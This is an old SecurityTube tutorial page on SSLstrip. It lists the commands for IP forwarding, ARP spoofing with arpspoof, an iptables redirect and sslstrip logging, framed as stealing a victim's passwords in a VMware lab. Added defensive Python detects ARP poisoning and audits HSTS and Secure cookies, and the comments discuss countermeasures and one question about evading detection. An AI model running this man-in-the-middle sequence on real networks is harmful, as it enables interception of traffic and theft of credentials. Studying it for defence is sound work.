Sslstrip Tutorial

Posted By: SecurityTube_Bot
Posted On: Mon 21 Feb 2011
Views: 55620


Description: SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Black Hat 2009. In this video we will look at how to get started with SSLstrip. We set up two VMware machines, one running Windows XP (victim) and the other BackTrack 3 (attacker). Before we actually begin hacking using SSLstrip, we need to set up the entire man-in-the-middle mechanism and the packet redirection/forwarding mechanism. We do this by using the following commands in sequence:

1. Set up IP forwarding, so the victim's packets still reach the gateway through us:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between the victim (192.168.1.6) and the gateway (192.168.1.1):

arpspoof -i eth0 -t 192.168.1.6 192.168.1.1

3. Set up port redirection using iptables, sending port 80 traffic to the port SSLstrip listens on:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4. Start the SSLstrip tool and make it listen on port 10000 (the default anyway), logging to the file "secret":

python sslstrip.py -w secret

Once this setup is up and running, all of the victim's traffic will be routed through us. In particular, HTTP traffic on port 80 will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop on and steal all of the victim's passwords that were supposedly sent over "SSL". If you are interested in understanding how the SSLstrip tool actually works, please view the entire presentation video here. You can download the SSLstrip tool here.
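The ARP poisoning in step 2 is visible from the victim's side: the gateway's entry in its ARP cache changes to the attacker's MAC, and that MAC then answers for two IP addresses at once. The following is an added example, not code from the video or from SecurityTube, that compares two `arp -n` snapshots and flags exactly those two symptoms, the same check tools like arpwatch run continuously. The snapshots are constructed; 192.168.1.50 and both MAC addresses are hypothetical values chosen for the illustration.

```python
"""Detect the ARP-cache symptom of the arpspoof step described above.

Added example: compares two snapshots of a host's ARP cache in Linux
`arp -n` format and reports (1) a change of the gateway's MAC address and
(2) a single MAC that now answers for more than one IP address.
All sample output below is constructed.
"""
import re
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"  # gateway address from the video's setup

# Constructed `arp -n` output before the ARP spoofing begins.
BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:aa:11:bb:22:cc   C                     eth0
192.168.1.50             ether   08:00:27:de:ad:01   C                     eth0
"""

# Constructed snapshot after poisoning: the gateway now resolves to the same
# MAC as 192.168.1.50 (a hypothetical attacker address).
AFTER = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   08:00:27:de:ad:01   C                     eth0
192.168.1.50             ether   08:00:27:de:ad:01   C                     eth0
"""

# One `arp -n` entry: IP, hardware type, MAC.  Header and "(incomplete)"
# entries do not match and are skipped.
ENTRY = re.compile(
    r"^(\d+\.\d+\.\d+\.\d+)\s+\S+\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I
)


def parse_arp(text):
    """Return {ip: mac} from `arp -n` output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def find_anomalies(before, after, gateway_ip=GATEWAY_IP):
    """Compare two ARP snapshots and return a list of human-readable findings."""
    old, new = parse_arp(before), parse_arp(after)
    findings = []

    # 1. The gateway's MAC changed between the two snapshots.
    if gateway_ip in old and gateway_ip in new and old[gateway_ip] != new[gateway_ip]:
        findings.append(
            f"gateway {gateway_ip} MAC changed {old[gateway_ip]} -> {new[gateway_ip]}"
        )

    # 2. One MAC now claims several IPs (the spoofer's MAC for the gateway
    #    as well as for its own address).
    by_mac = defaultdict(list)
    for ip, mac in new.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} answers for multiple IPs: {', '.join(sorted(ips))}")
    return findings


if __name__ == "__main__":
    for finding in find_anomalies(BEFORE, AFTER):
        print("ALERT:", finding)
```

Run on the two snapshots it prints one alert for the gateway MAC change and one for the shared MAC; on two identical snapshots it prints nothing. Feeding it periodic `arp -n` output from a host (or the `arp -a` output on Windows, after adjusting the regex for the dash-separated MAC format) gives the same alerting arpwatch provides.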




Tags: tools


Comments (12)

Osaka on Tue 08 Mar 2011

Very good video thank you.

dipzone2000 on Sun 13 Mar 2011

Good video. Please mention countermeasures.

StormCatcher on Wed 16 Mar 2011

That's really cool dude.
Great job.
OK, I got a question here.

When you use arpspoof (in a non-VM environment) in an actual live scenario, what happens is that the ARP table of the victim (WinXP) also shows the attacker's IP and MAC address, thereby exposing the attacker to the victim.

Any ways to circumvent this?

BTW i work on network forensics.

S0ap on Sat 09 Apr 2011

Well, this is great my friend. Good job. I just got my Sec+ and it's been a while, like 5 years into security. But I have one question which might be very dumb!

That IP you used is a private one; I mean that is the IP the user gets after going through NAT. How can we figure that out? I know this might be an easy one, but I just don't know.

Thanks, this was awesome...

reinfallt on Thu 14 Apr 2011

I am trying to use this together with a SLAAC attack instead of a regular ARP spoof attack but I can't get it to work. It's probably naptd messing things up. Any ideas?

Vishal on Thu 21 Apr 2011

Can you tell me the countermeasure for preventing this?

Mastermind on Sat 11 Jun 2011

XP --> 192.168.1.6 (NAT)

Please help me out:
1) It has only one interface, which is NAT, so how will BackTrack be able to ping XP?
2) What should be the IP configuration with BackTrack?

lcx_at on Wed 29 Jun 2011

Nice one. Played with sslstrip a little bit; seems like my netbanking has a solution for this. Good, and at the same time I'm curious how they solved it. Will investigate :)

marcusw on Wed 27 Jul 2011

The solution to this issue is very simple: make sure your login pages are using https. Keeping faith with the X.509 infrastructure which https uses (which may not be such a good idea), as long as https is being used, you're safe.

Thanks for the great video; I'm going to have lots of fun with ARP spoofing.

Peca on Sun 11 Sep 2011

One countermeasure can be a static ARP table, with the default gateway pointing to the real hardcoded MAC address:
arp -s 192.168.1.1 00-aa-11-bb-22-cc

Great video. Thanks.

TrojanCentaur on Thu 27 Oct 2011

Another countermeasure is either HSTS (Chrome or Firefox) or CSP (Firefox). It won't protect first time users, but the vast majority of your traffic (and your most sensitive information) will be posted by returning visitors.

Additionally, some cookies can be set to ONLY send via SSL, so existing sessions won't be preserved over sslstrip. Users *might* suspect something's up when they get mysteriously logged out.

TC
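SSLstrip only works because the browser's first request leaves as plain HTTP and the server's redirect to HTTPS gets rewritten in transit; the two defences TrojanCentaur names close that window for returning visitors (HSTS makes the browser upgrade to HTTPS before sending anything) and for existing sessions (a cookie flagged Secure is never sent on the stripped HTTP connection). The following is an added example, not code from the video or from the commenter, that audits a raw HTTPS login response for both. Both responses and the cookie names are constructed, and the one-year max-age threshold is the commonly recommended minimum, not a value from the page.

```python
"""Audit an HTTPS response for HSTS and Secure-flagged cookies.

Added example: parses a raw HTTP response header block and reports the
settings that would leave the site open to an SSL-stripping proxy.
Both sample responses are constructed; cookie names are placeholders.
"""
import re

ONE_YEAR = 31536000  # commonly recommended minimum HSTS max-age (seconds)

# Constructed: login response with neither defence.
WEAK = """\
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=abc123; Path=/; HttpOnly
Set-Cookie: remember=1; Path=/
"""

# Constructed: the same response with HSTS and Secure cookies.
HARDENED = """\
HTTP/1.1 200 OK
Content-Type: text/html
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly
Set-Cookie: remember=1; Path=/; Secure
"""


def parse_headers(raw):
    """Return [(lowercase name, value), ...] from a raw response, keeping duplicates.

    Duplicates matter because each cookie arrives in its own Set-Cookie header.
    """
    headers = []
    for line in raw.splitlines()[1:]:  # skip the status line
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def audit(raw):
    """Return a list of findings; an empty list means both defences are present."""
    headers = parse_headers(raw)
    findings = []

    # HSTS: present, and with a max-age long enough to cover return visits.
    hsts = [v for n, v in headers if n == "strict-transport-security"]
    if not hsts:
        findings.append("missing Strict-Transport-Security header")
    else:
        m = re.search(r"max-age=(\d+)", hsts[0], re.I)
        max_age = int(m.group(1)) if m else 0
        if max_age < ONE_YEAR:
            findings.append(f"HSTS max-age {max_age} is shorter than one year")

    # Cookies: every Set-Cookie must carry the Secure attribute.
    for n, v in headers:
        if n == "set-cookie":
            cookie_name = v.split("=", 1)[0].strip()
            attrs = [a.strip().lower() for a in v.split(";")[1:]]
            if "secure" not in attrs:
                findings.append(f"cookie {cookie_name} lacks the Secure flag")
    return findings


if __name__ == "__main__":
    for label, response in (("weak", WEAK), ("hardened", HARDENED)):
        print(f"{label}: {audit(response) or ['ok']}")
```

The weak response yields three findings (no HSTS header, two insecure cookies); the hardened one yields none. Pointing the same check at real responses captured with curl -i is a quick way to confirm a login page has both defences before trusting it against a stripping proxy.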

yash_advani on Sat 05 Nov 2011

Hi,
This is for those of you who were wondering if there was any countermeasure available.
Well yes, you can use tools like 'arpwatch' or 'arpon' that allow you to prevent ARP spoofing.
Arpwatch keeps a watch on your ARP table and any changes found in it are recorded. You can provide settings using which you will be alerted whenever your ARP table gets modified.
Arpon is one step further. It not only detects the change, it prevents it as well, thus automatically securing your machine from ARP spoofing.

Great video, good job :)
